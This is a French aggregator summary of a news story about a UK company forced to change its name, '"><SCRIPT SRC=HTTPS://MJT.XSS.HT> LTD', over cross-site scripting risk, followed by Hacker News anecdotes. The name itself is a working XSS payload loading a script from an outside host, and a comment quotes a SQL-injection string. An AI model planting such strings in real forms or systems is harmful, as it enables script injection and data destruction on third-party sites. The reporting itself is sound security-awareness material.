Changement de nom imposé à « “><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD » (2020)

 (theguardian.com)
2 points par GN⁺ 2024-10-26 | 1 commentaires | Partager sur WhatsApp

  • Changement forcé du nom de l’entreprise

    • Companies House a imposé un changement de nom en raison d’un risque de sécurité
    • Le nom d’origine était “><SCRIPT SRC=HTTPS://MJT.XSS.HT>; LTD, ce qui le rendait vulnérable à une attaque de cross-site scripting (XSS)
    • La faille de sécurité a été démontrée en chargeant un script depuis le site XSSHunter afin d’afficher un message d’alerte

  • Contexte du changement de nom

    • Un ingénieur logiciel britannique a créé l’entreprise avec un nom choisi pour son côté amusant et espiègle
    • Companies House a reconnu que ce nom pouvait créer un risque de sécurité et a exigé qu’il soit changé
    • Des noms similaires avaient déjà été enregistrés auparavant, mais ce cas est le premier à avoir déclenché une intervention

  • Mesures de sécurité

    • Companies House a pris des mesures immédiates pour réduire le risque de sécurité et a mis en place des garde-fous pour éviter que des cas similaires ne se reproduisent
    • Le nom de l’entreprise a désormais été modifié en THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD

  • Position du directeur de l’entreprise

    • Le directeur pensait que le Government Digital Service (GDS) avait une bonne réputation en matière de sécurité et qu’il n’y aurait donc pas de problème
    • Dès que le problème a été découvert, il a immédiatement contacté Companies House et le National Cyber Security Centre

Le récapitulatif de GN⁺

  • Cet article traite des risques de sécurité pouvant survenir lorsqu’un nom d’entreprise contient du code HTML
  • Il sensibilise aux vulnérabilités de sécurité comme le cross-site scripting (XSS)
  • Parmi d’autres projets du secteur offrant une fonction similaire, on peut recommander les guides de sécurité de l’OWASP
  • Cet article contribue à renforcer la sensibilisation à la sécurité et souligne l’importance de prendre en compte ces enjeux lors de l’enregistrement d’un nom d’entreprise

À lire aussi

1 commentaires

 
GN⁺ 2024-10-26
Avis Hacker News

  • Un utilisateur a partagé un cas où il a exploité le système d’exploitation Windows et le logiciel antivirus d’un terminal de parking. En encodant la chaîne de test EICAR dans un code QR puis en la faisant scanner, une fenêtre pop-up de l’antivirus a recouvert l’écran du terminal et l’a rendu inutilisable

  • Un excellent cas de trolling qui a nécessité une modification de la loi, laquelle a ensuite été révisée pour interdire l’inclusion de code informatique dans les raisons sociales

  • En 2014, un automobiliste polonais aurait ajouté une injection SQL à sa plaque d’immatriculation pour éviter les radars

  • Une entreprise utilisait un nom contenant une balise de script HTML et a finalement été contrainte légalement de le modifier

  • Le nom du fondateur était "ROBERT'); DROP TABLE STUDENTS;", ce qui rappelle le célèbre cas de Little Bobby Tables

  • Quelqu’un a raconté qu’autour de l’an 2000, il utilisait des scripts sur Coke Auction pour empêcher les autres d’enchérir. Il a remporté beaucoup d’objets, mais son compte a fini par être supprimé et il a reçu un avertissement de Coke UK

  • Il est souligné qu’il n’est pas clair, dans les flux RSS, si l’élément title est du HTML ou du texte brut. Atom précise explicitement que l’élément title doit être traité comme du texte brut

  • Il est mentionné qu’une entreprise a été enregistrée avec des caractères pouvant poser un risque de sécurité, sans affecter Companies House elle-même, mais que la sécurité de certains clients a peut-être été fragilisée

  • Un article de 2020 traitait de ce cas connexe